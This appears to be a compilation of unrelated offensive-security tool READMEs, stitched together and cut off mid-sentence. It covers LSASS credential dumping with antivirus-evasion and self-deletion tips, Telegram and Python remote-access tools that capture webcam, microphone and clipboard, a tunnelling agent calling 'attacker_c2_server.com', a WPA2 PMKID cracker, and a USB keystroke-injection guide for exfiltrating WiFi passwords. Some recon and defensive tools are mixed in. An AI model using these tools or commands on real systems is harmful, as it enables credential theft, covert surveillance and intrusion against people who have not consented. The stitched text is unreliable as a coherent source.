The handler depends on Pypykatz to parse the LSASS dump, and impacket to parse the registry saves. They should be installed in your environment. If you see the error All detection methods failed, it's likely the Pypykatz version is outdated.
By default, MultiDump uses the comsvcs.dll method and saves the encrypted dump in the current directory.
MultiDump.exe
...
[i] Local Mode Selected. Writing Encrypted Dump File to Disk...
[i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
./MultiDumpHandler.py -l dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
If --procdump is used, ProcDump.exe will be written to disk to dump LSASS.
In remote mode, MultiDump connects to the handler's listener.
./MultiDumpHandler.py -r 9001
[i] Listening on port 9001 for encrypted key...
MultiDump.exe -r 10.0.0.1:9001
The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.
An additional option to dump the SAM, SECURITY and SYSTEM hives is available with --reg; the decryption process is the same as for LSASS dumps. This is more of a convenience feature to make post-exploitation information gathering easier.
Open in Visual Studio, build in Release mode.
It is recommended to customise the binary before compiling, such as changing the static strings or the RC4 key used to encrypt them. To do so, another Visual Studio project, EncryptionHelper, is included. Simply change the key or strings, and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.
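For reference, a minimal Python sketch of the same RC4 keystream logic can be used to pre-compute obfuscated strings; the key below is a placeholder, not the project's actual key:

def rc4(key: bytes, data: bytes) -> bytes:
    # Key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA)
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

ciphertext = rc4(b"placeholder-key", b"lsass.dmp")
print(ciphertext.hex())  # RC4 is symmetric: rc4(key, ciphertext) recovers the string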
Self deletion can be toggled by uncommenting the following line in Common.h:
#define SELF_DELETION
To further evade string analysis, most of the output messages can be excluded from compilation by commenting out the following line in Debug.h:
//#define DEBUG
MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of). The investigation and implementation deserve a blog post of their own: https://xre0us.io/posts/saving-lsass-from-defender/
During the reconnaissance phase or when doing OSINT, we often use Google dorking and Shodan, and thus the idea of Dorkish.
Dorkish is a Chrome extension tool that facilitates custom dork creation for Google and Shodan using its builder, and it offers prebuilt dorks for efficient reconnaissance and OSINT engagements.
1- Clone the repository
git clone https://github.com/yousseflahouifi/dorkish.git
2- Go to chrome://extensions/ and enable the Developer mode in the top right corner.
3- Click on the Load unpacked extension button and select the dorkish folder.
Note: For Firefox users, you can find the extension here: https://addons.mozilla.org/en-US/firefox/addon/dorkish/
Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.
I have built some dorks and used some public resources to gather others; here are a few: - https://github.com/lothos612/shodan - https://github.com/TakSec/google-dorks-bug-bounty
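Under the hood, a dork is just a query string passed to the search engine. A minimal Python sketch of that idea, independent of the extension's code:

from urllib.parse import quote_plus

def google_dork(**operators) -> str:
    # e.g. site:example.com inurl:admin filetype:pdf
    query = " ".join(f"{op}:{value}" for op, value in operators.items())
    return "https://www.google.com/search?q=" + quote_plus(query)

print(google_dork(site="example.com", inurl="admin", filetype="pdf"))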
Remote administration cross-platform tool via Telegram. Coded with ❤️ in python3 + aiogram3. https://t.me/pt_soft
/start - start pyradm
/help - help
/shell - shell commands
/sc - screenshot
/download - download (abs. path)
/info - system info
/ip - public ip address and geolocation
/ps - process list
/webcam 5 - record video (secs)
/webcam - screenshot from camera
/fm - filemanager
/fm /home or /fm C:\
/mic 10 - record audio from mic
/clip - get clipboard data
Press button to download file
Send any file as file for upload to target
git clone https://github.com/akhomlyuk/pyradm.git
cd pyradm
pip3 install -r requirements.txt
Put the bot token in cfg.py; ask @BotFather
python3 main.py
Put the bot token in cfg.py
pip install nuitka
nuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py
BackdoorSim is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer and BackdoorClient. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.
This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.
To set up BackdoorSim
, you will need to install it on both the server and client machines.
$ git clone https://github.com/HalilDeniz/BackDoorSim.git
$ cd BackDoorSim
$ pip install -r requirements.txt
After starting both the server and client, you can use the following commands in the server's command prompt:
upload [file_path] : Upload a file to the client.
download [file_path] : Download a file from the client.
screenshot : Capture a screenshot from the client.
sysinfo : Get system information from the client.
securityinfo : Get security software status from the client.
camshot : Capture an image from the client's webcam.
notify [title] [message] : Send a notification to the client.
help : Display the help menu.
BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.
If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool
If you want to read our article about Backdoor
Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.
1. Fork the repository.
2. Create a new branch for your feature or bug fix.
3. Make your changes and commit them.
4. Push your changes to your forked repository.
5. Open a pull request in the main repository.
For any inquiries or further information, you can reach me through the following channels:
AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.
AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.
With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.
During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.
➜ AzSubEnum git:(main) ✗ python3 azsubenum.py --help
usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]
Azure Subdomain Enumeration
options:
-h, --help show this help message and exit
-b BASE, --base BASE Base name to use
-v, --verbose Show verbose output
-t THREADS, --threads THREADS
Number of threads for concurrent execution
-p PERMUTATIONS, --permutations PERMUTATIONS
File containing permutations
Basic enumeration:
python3 azsubenum.py -b retailcorp --threads 10
Using permutation wordlists:
python3 azsubenum.py -b retailcorp --threads 10 --permutations permutations.txt
With verbose output:
python3 azsubenum.py -b retailcorp --threads 10 --permutations permutations.txt --verbose
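The underlying technique is DNS resolution of permuted names against known Azure service suffixes. A minimal Python sketch of that loop; the suffix list here is a small assumed subset, not AzSubEnum's full set:

import socket

SUFFIXES = [".azurewebsites.net", ".blob.core.windows.net", ".vault.azure.net"]  # subset

def enumerate_subdomains(base: str, words: list[str]) -> None:
    for word in [""] + words:
        candidate = f"{base}{word}" if word else base
        for suffix in SUFFIXES:
            fqdn = candidate + suffix
            try:
                socket.gethostbyname(fqdn)   # resolves -> the service name exists
                print("[+]", fqdn)
            except socket.gaierror:
                pass                         # NXDOMAIN -> skip

enumerate_subdomains("retailcorp", ["dev", "prod", "backup"])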
MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.
$ pip3 install colorama
$ pip3 install paramiko
$ git clone https://github.com/emrekybs/BlueFish.git
$ cd MrHandler
$ chmod +x MrHandler.py
$ python3 MrHandler.py
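A minimal paramiko sketch of the kind of SSH collection loop MR.Handler automates; the host, credentials, and command list are placeholders:

import paramiko

HOST, USER, PASSWORD = "10.0.0.5", "analyst", "secret"          # placeholders
COMMANDS = ["uname -a", "who", "ss -tulpn", "last -n 20"]       # sample diagnostics

client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(HOST, username=USER, password=PASSWORD)

report = {}
for cmd in COMMANDS:
    stdin, stdout, stderr = client.exec_command(cmd)
    report[cmd] = stdout.read().decode(errors="replace")
client.close()

for cmd, output in report.items():
    print(f"== {cmd} ==\n{output}")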
WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.
git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
cd web-wordlist-generator && pip3 install -r requirements.txt
python3 generator.py -d target-web.com
You can run this application in a container after building the Dockerfile.
docker build -t webwordlistgenerator .
docker run webwordlistgenerator -d target-web.com -o
You can run this application on a container after pulling from DockerHub.
docker pull osmankandemir/webwordlistgenerator:v1.0
docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o
-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input multiple or single targets. --domains target-web1.com target-web2.com
-p PROXY, --proxy PROXY Use an HTTP proxy. --proxy 0.0.0.0:8080
-a AGENT, --agent AGENT Use a custom user agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
-o PRINT, --print PRINT Print outputs to the terminal screen.
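Conceptually, the generator boils down to fetching a page and tokenizing its content into candidate words. A minimal sketch assuming requests and BeautifulSoup, as an illustration rather than the project's exact pipeline:

import re
import requests
from bs4 import BeautifulSoup

def build_wordlist(url: str) -> list[str]:
    html = requests.get(url, timeout=10).text
    text = BeautifulSoup(html, "html.parser").get_text(" ")
    words = set(re.findall(r"[A-Za-z0-9_-]{4,}", text))  # keep tokens of 4+ chars
    return sorted(words)

for word in build_wordlist("https://target-web.com")[:20]:
    print(word)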
To know more about our Attack Surface Management platform, check out NVADR.
RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.
With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:
We listed all vulnerabilities discovered using Raven in the tool Hall of Fame.
The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:
Possible usages for Raven:
This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.
In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear: the model in which security is delegated to developers has failed. This has been proven several times in our previous content:
Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality: each exploitation can impact millions of victims.
It was for these reasons that Raven was created, a framework for CI/CD security analysis workflows (and GitHub Actions as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.
To get started with Raven, follow these installation instructions:
Step 1: Install the Raven package
pip3 install raven-cycode
Step 2: Setup a local Redis server and Neo4j database
docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1
Another way to setup the environment is by running our provided docker compose file:
git clone https://github.com/CycodeLabs/raven.git
cd raven
make setup
Step 3: Run Raven Downloader
Org mode:
raven download org --token $GITHUB_TOKEN --org-name RavenDemo
Crawl mode:
raven download crawl --token $GITHUB_TOKEN --min-stars 1000
Step 4: Run Raven Indexer
raven index
Step 5: Inspect the results through the reporter
raven report --format raw
At this point, it is possible to inspect the data in the Neo4j database, by connecting http://localhost:7474/browser/.
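Besides the browser, the database can also be queried programmatically. A minimal sketch with the official neo4j Python driver, reusing the credentials from Step 2; the Cypher here simply counts nodes rather than assuming Raven's schema:

from neo4j import GraphDatabase

driver = GraphDatabase.driver("neo4j://localhost:7687", auth=("neo4j", "123456789"))
with driver.session() as session:
    count = session.run("MATCH (n) RETURN count(n) AS total").single()["total"]
    print(f"Indexed graph contains {count} nodes")
driver.close()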
Raven uses two primary docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.
The tool contains three main functionalities: download, index, and report.
usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME
options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--org-name ORG_NAME Organization name to download the workflows
usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]
options:
-h, --help show this help message and exit
--token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
--debug Whether to print debug statements, default: False
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--max-stars MAX_STARS
Maximum number of stars for a repository
--min-stars MIN_STARS
Minimum number of stars for a repository, default : 1000
usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
[--clean-neo4j] [--debug]
options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--debug Whether to print debug statements, default: False
usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
[--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
[--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
[--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
{slack} ...
positional arguments:
{slack}
slack Send report to slack channel
options:
-h, --help show this help message and exit
--redis-host REDIS_HOST
Redis host, default: localhost
--redis-port REDIS_PORT
Redis port, default: 6379
--clean-redis, -cr Whether to clean cache in the redis, default: False
--neo4j-uri NEO4J_URI
Neo4j URI endpoint, default: neo4j://localhost:7687
--neo4j-user NEO4J_USER
Neo4j username, default: neo4j
--neo4j-pass NEO4J_PASS
Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
Filter queries with specific tag
--severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
Filter queries by severity level (default: info)
--queries-path QUERIES_PATH, -dp QUERIES_PATH
Queries folder (default: library)
--format {raw,json}, -f {raw,json}
Report format (default: raw)
Retrieve all workflows and actions associated with the organization.
raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug
Scrape all publicly accessible GitHub repositories.
raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug
After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.
raven index --debug
Now, we can generate a report using our query library.
raven report --severity high --tag injection --tag unauthenticated
For effective rate limiting, you should supply a Github token. For authenticated users, the following rate limits apply:
- Dockerfile (without action.yml). Currently, this behavior isn't supported.
- docker://... URL. Currently, this behavior isn't supported.
- data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for code execution.
- GITHUB_ENV. This may utilize the previous taint analysis as well.
- actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.
If you liked Raven, you would probably love our Cycode platform, which offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.
If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using gVisor.
When running the relay/proxy server, a tun interface is used; packets sent to this interface are translated and then transmitted to the agent's remote network.
As an example, for a TCP connection:
This allows running tools like nmap without the use of proxychains (simpler and faster).
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).
Start the proxy server on your Command and Control (C2) server (default port 11601):
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.
The -ignore-cert option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
Use the session command to select the agent.
ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
Display the network configuration of the agent using the ifconfig command:
[Agent : nchatelain@nworkstation] » ifconfig
[...]
Interface 3
  Name: wlp3s0
  Hardware MAC: de:ad:be:ef:ca:fe
  MTU: 1500
  Flags: up|broadcast|multicast
  IPv4 Address: 192.168.0.30/24
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.
Linux:
$ sudo ip route add 192.168.0.0/24 dev ligolo
Windows:
> netsh int ipv4 show interfaces
Idx Mét MTU État Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo
> route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
Start the tunnel on the proxy:
[Agent : nchatelain@nworkstation] » start
[Agent : nchatelain@nworkstation] » INFO[0690] Starting tunnel to nchatelain@nworkstation
You can now access the 192.168.0.0/24 agent network from the proxy server.
$ nmap 192.168.0.0/24 -v -sV -n
[...]
$ rdesktop 192.168.0.123
[...]
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the listener_add command.
The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.
[Agent : nchatelain@nworkstation] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent!
On the proxy:
$ nc -lvp 4321
When a connection is made on TCP port 1234 of the agent, nc will receive the connection.
This is very useful when using reverse tcp/udp payloads.
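Conceptually, the agent-side listener is a plain TCP relay: accept on the agent address, forward to the proxy's redirect address. A standalone Python sketch of that mechanism (an illustration, not Ligolo-ng's code):

import socket
import threading

def pipe(src: socket.socket, dst: socket.socket) -> None:
    # Copy bytes one way until either side closes.
    while data := src.recv(4096):
        dst.sendall(data)

def relay(listen_addr=("0.0.0.0", 1234), to_addr=("127.0.0.1", 4321)) -> None:
    server = socket.create_server(listen_addr)
    while True:
        client, _ = server.accept()
        upstream = socket.create_connection(to_addr)
        threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
        threading.Thread(target=pipe, args=(upstream, client), daemon=True).start()

relay()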
You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:
[Agent : nchatelain@nworkstation] » listener_list
Active listeners
# | AGENT | AGENT LISTENER ADDRESS | PROXY REDIRECT ADDRESS
0 | nchatelain@nworkstation | 0.0.0.0:1234 | 127.0.0.1:4321
[Agent : nchatelain@nworkstation] » listener_stop 0
INFO[1505] Listener closed.
On the agent side, no! Everything can be performed without administrative access.
However, on your relay/proxy server, you need to be able to create a tun interface.
You can easily hit more than 100 Mbits/sec. Here is a test using iperf from a 200Mbits/s server to a 200Mbits/s connection.
$ iperf3 -c 10.10.0.1 -p 24483
Connecting to host 10.10.0.1, port 24483
[ 5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483
[ ID] Interval Transfer Bitrate Retr Cwnd
[ 5] 0.00-1.00 sec 12.5 MBytes 105 Mbits/sec 0 164 KBytes
[ 5] 1.00-2.00 sec 12.7 MBytes 107 Mbits/sec 0 263 KBytes
[ 5] 2.00-3.00 sec 12.4 MBytes 104 Mbits/sec 0 263 KBytes
[ 5] 3.00-4.00 sec 12.7 MBytes 106 Mbits/sec 0 263 KBytes
[ 5] 4.00-5.00 sec 13.1 MBytes 110 Mbits/sec 2 134 KBytes
[ 5] 5.00-6.00 sec 13.4 MBytes 113 Mbits/sec 0 147 KBytes
[ 5] 6.00-7.00 sec 12.6 MBytes 105 Mbits/sec 0 158 KBytes
[ 5] 7.00-8.00 sec 12.1 MBytes 101 Mbits/sec 0 173 KBytes
[ 5] 8.00-9.00 sec 12.7 MBytes 106 Mbits/sec 0 182 KBytes
[ 5] 9.00-10.00 sec 12.6 MBytes 106 Mbits/sec 0 188 KBytes
- - - - - - - - - - - - - - - - - - - - - - - - -
[ ID] Interval Transfer Bitrate Retr
[ 5] 0.00-10.00 sec 127 MBytes 106 Mbits/sec 2 sender
[ 5] 0.00-10.08 sec 125 MBytes 104 Mbits/sec receiver
Because the agent is running without privileges, it's not possible to forward raw packets. When you perform a NMAP SYN-SCAN, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged or -PE to avoid false positives.
Introducing Uscrapper 2.0, a powerful OSINT web scraper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, and supports multithreading to make this process faster. Uscrapper 2.0 is equipped with advanced anti-web-scraping bypass modules and supports web crawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
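As an illustration of the regex-based extraction, here is a minimal Python sketch that pulls emails and phone-like strings from a page; the patterns are simplified placeholders rather than Uscrapper's own:

import re
import requests

PATTERNS = {
    "emails": r"[\w.+-]+@[\w-]+\.[\w.-]+",
    "phones": r"\+?\d[\d ()-]{7,}\d",   # loose phone-number shape
}

html = requests.get("https://example.com", timeout=10).text
for label, pattern in PATTERNS.items():
    print(label, "->", sorted(set(re.findall(pattern, html))))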
Uscrapper extracts the following details from the provided website:
Uscrapper 2.0:
git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems
To run Uscrapper, use the following command-line syntax:
python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]
Arguments:
Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.
The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.
To bypass some anti-web-scraping methods we have used Selenium, which can make the overall process slower.
This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.
python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>
NOTE: apmac, clientmac, and pmkid must be hex strings, e.g. b8621f50edd9
The two main formulas to obtain a PMKID are as follows:
PMK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096, 256)
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
This is just for understanding; both are already implemented in find_pw_chunk and calculate_pmkid.
Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.
*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.
To obtain the PMKID manually from Wireshark, put your wireless antenna in monitor mode, and start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.
Open the pcap in WireShark:
Use the filter wlan_rsna_eapol.keydes.msgnr == 1 in Wireshark to display only EAPOL message 1 packets.
If the access point is vulnerable, you should see the PMKID value like in the screenshot below:
This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.
PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.
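The core primitive is a GET request routed through a rotating proxy. A minimal Python sketch with requests; the proxy entries follow the proxies.txt format described below, and the target URL is a placeholder:

import random
import requests

proxies = open("proxies.txt").read().split()   # one ip:port per line
proxy = random.choice(proxies)
resp = requests.get(
    "https://target-web.com",
    proxies={"http": f"http://{proxy}", "https": f"http://{proxy}"},
    timeout=10,
)
print(proxy, resp.status_code)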
Features:
Usage:
Add your proxies to proxies.txt in this format: 50.168.163.176:80
How to Use:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
pip3 install -r requirements.txt
python3 PhantomCrawler.py
Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.
Have you ever watched a film where a hacker would plug a seemingly ordinary USB drive into a victim's computer and steal data from it? - A proper wet dream for some.
Disclaimer: All content in this project is intended for security research purpose only.
During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).
After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.
Physical access to victim's computer.
Unlocked victim's computer.
Victim's computer has to have internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.
Knowledge of victim's computer password for the Linux exploit.
Note:
It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.
However, while pico-ducky is a good and budget-friendly solution, Rubber Ducky does offer things like stealthiness and usage of the latest DuckyScript version.
In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.
Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.
The payload uses the STRING command to process keystrokes for injection. It accepts one or more alphanumeric/punctuation characters and types the remainder of the line exactly as-is into the target machine. The ENTER/SPACE commands simulate presses of the corresponding keyboard keys.
We use the DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a command line to load. A delay is especially useful at the very beginning, when a new USB device is connected to the targeted computer: the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs the setup time is very short; in most cases it takes a fraction of a second, because the drivers are built-in. However, in some instances a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
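To make those command semantics concrete, here is a small Python sketch of my own (not part of the project) that assembles a trivial DuckyScript payload from DELAY/STRING/ENTER lines:
# Illustrative only: compose a minimal DuckyScript payload as text.
# DELAY pauses (milliseconds), STRING types a literal line, ENTER presses Enter.
lines = [
    "DELAY 1000",            # wait for the OS to register the HID device
    "STRING echo hello",     # typed exactly as-is into the focused window
    "ENTER",                 # simulate pressing the Enter key
]
with open("payload.dd", "w") as f:   # "payload.dd" is a hypothetical file name
    f.write("\n".join(lines) + "\n")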
Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, an adversary can package it to avoid detection while sending it over the network, using encryption or compression. The two most common ways of exfiltration are:
Exfiltration over a network medium. This approach was used for the Windows exploit. The whole payload can be seen here.
Exfiltration over a physical medium (a USB flash drive). This approach was used for the Linux exploit. The whole payload can be seen here.
In order to use the Windows payload (payload1.dd
), you don't need to connect any jumper wire between pins.
Once passwords have been exported to the .txt
